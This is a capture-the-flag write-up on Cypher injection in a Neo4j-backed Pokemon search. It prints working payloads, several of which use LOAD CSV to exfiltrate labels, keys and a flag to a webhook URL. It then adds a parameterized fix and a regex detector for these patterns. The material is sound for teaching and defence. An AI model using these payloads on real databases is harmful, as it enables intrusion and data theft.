Tags: web injection neo4j 


One comma causes an error, which means injection. It's not SQL, though: from the returned error it looks like a Neo4j database.
After some trial and error I came to the conclusion that the query looks something like this, where `{param}` stands for the user input spliced straight into the quoted string rather than bound as a parameter:
`MATCH (pokemon:Pokemon) WHERE pokemon.name =~ '.*' + toLower({param}) + '.*' RETURN pokemon`

Sending this:
`') RETURN pokemon//`
works perfectly: the `')` closes the string literal and the toLower() call, and `//` comments out the rest of the original query.

Abuse LOAD CSV to leak information out of band. LOAD CSV makes the database itself fetch the given URL, so building that URL from query data sends the data to a webhook listener:

`') CALL db.labels() YIELD name as label LOAD CSV FROM 'https://webhook.site/REDACTED/'+label AS y RETURN *//`

This reveals that there are two node labels in the graph: pokemon and flag.
Next, read the property keys of the flag node:
`') MATCH (f:flag) WITH KEYS(f) as keys UNWIND keys as key LOAD CSV FROM 'https://webhook.site/REDACTED/'+key AS y RETURN *//`

This reveals a property named flag; the same trick exfiltrates its value:

`') MATCH (f:flag) WITH f.flag as ff LOAD CSV FROM 'https://webhook.site/REDACTED/'+ff AS y RETURN *//`
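Added example, not part of the original writeup: the concatenating query shape inferred above beside its parameterized fix, plus a small detector for the LOAD CSV exfiltration pattern run over constructed query-log lines. The function names, the exact query text of the app and the log lines are assumptions.

```python
import re

# Assumed shape of the vulnerable query: the user string is spliced into the
# Cypher text, so a quote and a parenthesis in the input change the query's structure.
def build_query_unsafe(name: str) -> str:
    return ("MATCH (pokemon:Pokemon) WHERE pokemon.name =~ '.*' + toLower('"
            + name + "') + '.*' RETURN pokemon")

# Hardened form: the value travels as a bound parameter ($name), never as Cypher
# text. With the official driver this pair is passed as session.run(query, **params).
def build_query_safe(name: str) -> tuple:
    query = ("MATCH (pokemon:Pokemon) WHERE pokemon.name =~ '.*' + toLower($name) + '.*' "
             "RETURN pokemon")
    return query, {"name": name}

# Detection over a Cypher query log: these constructs appearing in a query that
# should only be a name lookup are a strong signal of the technique in the writeup.
SUSPICIOUS = [
    re.compile(r"LOAD\s+CSV\s+FROM\s+'https?://[^']*'\s*\+", re.I),  # URL built from query data
    re.compile(r"CALL\s+db\.(labels|propertyKeys)\(\)", re.I),       # schema enumeration
    re.compile(r"\)\s*RETURN\s+[\w*]+\s*//", re.I),                   # literal closed, rest commented out
]

def flag_queries(log_lines):
    """Return the log lines that match any suspicious pattern."""
    return [line for line in log_lines if any(p.search(line) for p in SUSPICIOUS)]

# Constructed log lines: one benign lookup and the two probes from the writeup,
# each as the full query text the vulnerable app would have sent to Neo4j.
SAMPLE_LOG = [
    build_query_unsafe("pikachu"),
    build_query_unsafe("') RETURN pokemon//"),
    build_query_unsafe("') CALL db.labels() YIELD name as label LOAD CSV FROM "
                       "'https://webhook.site/REDACTED/'+label AS y RETURN *//"),
]

if __name__ == "__main__":
    for hit in flag_queries(SAMPLE_LOG):
        print("suspicious query:", hit)
    query, params = build_query_safe("') RETURN pokemon//")
    print("parameterized:", query, params)
```

Blocking outbound HTTP from the database host also removes the LOAD CSV exfiltration channel even where the injection itself is not yet fixed.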